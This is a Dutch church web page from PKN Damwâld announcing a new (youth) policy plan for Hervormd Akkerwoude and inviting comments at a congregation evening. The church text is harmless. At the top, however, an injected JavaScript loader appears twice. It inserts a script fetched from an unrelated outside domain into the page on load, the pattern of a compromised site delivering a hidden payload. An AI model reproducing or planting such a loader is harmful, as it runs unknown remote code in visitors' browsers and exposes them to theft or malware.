;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuw (jongeren-) beleidsplan Hervormd Akkerwoude c.a. - PKN Damwâld

Nieuw (jongeren-) beleidsplan Hervormd Akkerwoude c.a.

Gepubliceerd op: maandag 28 oktober 2019

De afgelopen periode is een nieuw beleidsplan voor onze kerk geschreven. Het beleidsplan is tot stand gekomen vanuit een werkgroep die bestond uit een aantal gemeenteleden en een aantal kerkenraadsleden. Voordat het beleidsplan definitief wordt vastgesteld, maakt de kerkenraad graag van de gelegenheid gebruik om de gemeente hierover op de gemeenteavond op 25 november ‘te horen’. Het nieuwe beleidsplan ligt daarom een aantal weken voorafgaand aan de gemeenteavond achterin de kerk ter inzage en is ook op deze website te raadplegen zijn. Op de gemeenteavond is er gelegenheid om uw vragen te stellen en eventuele opmerkingen kenbaar te maken.